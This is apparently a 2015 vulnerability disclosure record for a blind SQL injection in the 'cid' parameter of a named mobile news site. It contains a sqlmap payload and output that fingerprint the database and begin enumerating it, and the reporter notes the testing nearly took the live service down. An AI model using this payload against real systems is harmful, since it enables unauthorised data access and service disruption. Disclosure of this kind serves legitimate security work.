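2015-06-12: Details reported to the vendor; awaiting vendor response
2015-06-17: The vendor has chosen to ignore the vulnerability; details disclosed to the public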
233
Tested with a time-based payload and nearly killed the service.
http://m.xianguo.com/homeindex/list?cid=1&tagid=7_31
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cid=(SELECT (CASE WHEN (1888=1888) THEN 1888 ELSE 1888*(SELECT 1888 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&tagid=7_31
---
[14:46:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL 5.0
[14:46:19] [INFO] fetching current user
[14:46:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:46:19] [INFO] retrieved: reader@%
current user: 'reader@%'
[14:46:31] [INFO] testing if current user is DBA
[14:46:31] [INFO] fetching current user
[14:46:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[14:46:32] [INFO] fetching database names
[14:46:32] [INFO] fetching number of databases
[14:46:32] [INFO] retrieved: 35
[14:46:34] [INFO] retrieved: information_schema
[14:46:57] [INFO] retrieved: analy
......
The service is still a bit unstable, so I stopped running it.
~~~~~~~~~
Severity: No impact (ignored by vendor)
Ignored at: 2015-06-17 15:04
Vulnerability Rank: 15 (rated by WooYun)
None yet